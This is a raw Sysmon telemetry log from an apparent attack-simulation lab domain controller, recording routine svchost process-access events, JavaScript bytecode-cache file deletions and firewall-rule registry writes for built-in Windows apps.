12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.410{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.395{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|M=microsoft.windows.secondarytileexperience_cw5n1h2txyewy|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|D=C:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\|PFN=Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy| 13241300x80000000000000005519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|M=microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy| 13241300x80000000000000005518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7D1F5F64-44D7-4063-9E7D-CF8C553C73BA}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{87C8FB50-D8DC-410E-A0E6-13F157162BEB}v2.26|Action=Block|Active=TRUE|Dir=In|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{D61C88B2-0334-4906-AE00-7F3841B24151}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 13241300x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
